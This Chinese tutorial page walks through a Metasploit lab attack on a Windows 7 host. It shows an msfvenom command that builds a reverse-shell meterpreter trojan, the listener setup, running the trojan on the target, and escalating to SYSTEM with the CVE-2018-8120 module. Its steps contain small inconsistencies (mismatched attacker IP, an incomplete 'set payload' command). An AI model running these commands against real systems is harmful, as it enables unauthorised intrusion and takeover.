溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

Metasploit中如何利用cve-2018-8120提升權(quán)限

發(fā)布時(shí)間:2021-12-09 18:23:07 來(lái)源:億速云 閱讀:142 作者:柒染 欄目:大數(shù)據(jù)

這篇文章將為大家詳細(xì)講解有關(guān)Metasploit中如何利用cve-2018-8120提升權(quán)限,文章內(nèi)容質(zhì)量較高,因此小編分享給大家做個(gè)參考,希望大家閱讀完這篇文章后對(duì)相關(guān)知識(shí)有一定的了解。

一、生成木馬

目標(biāo)主機(jī):192.168.1.129(win7 x64)

攻擊機(jī):192.168.1.33 

攻擊端口:12121 

生成木馬:msfvenom --arch x64 --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.133 lport=12121 -f exe -o /root/win64.exe

Metasploit中如何利用cve-2018-8120提升權(quán)限

二、進(jìn)入監(jiān)聽(tīng)模塊          use exploit/multi/handler 

三、設(shè)置payload反彈    set windows/x64/meterpreter/reverse_tcp

Metasploit中如何利用cve-2018-8120提升權(quán)限

四、查看需要設(shè)置的參數(shù):show options

Metasploit中如何利用cve-2018-8120提升權(quán)限

五、設(shè)置攻擊機(jī)ip:set lhost 192.168.1.133

六、設(shè)置攻擊端口:set lport 12121

Metasploit中如何利用cve-2018-8120提升權(quán)限

七、將生成的exe文件上傳到目標(biāo)主機(jī)并運(yùn)行

八、run攻擊

Metasploit中如何利用cve-2018-8120提升權(quán)限

九、getuid  查看權(quán)限

十、background  后臺(tái)運(yùn)行

Metasploit中如何利用cve-2018-8120提升權(quán)限

十一、搜索我們要利用的模塊  search cve-2018-8120,并選擇進(jìn)入

Metasploit中如何利用cve-2018-8120提升權(quán)限

十二、run,運(yùn)行,并重新查看權(quán)限

Metasploit中如何利用cve-2018-8120提升權(quán)限

關(guān)于Metasploit中如何利用cve-2018-8120提升權(quán)限就分享到這里了,希望以上內(nèi)容可以對(duì)大家有一定的幫助,可以學(xué)到更多知識(shí)。如果覺(jué)得文章不錯(cuò),可以把它分享出去讓更多的人看到。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI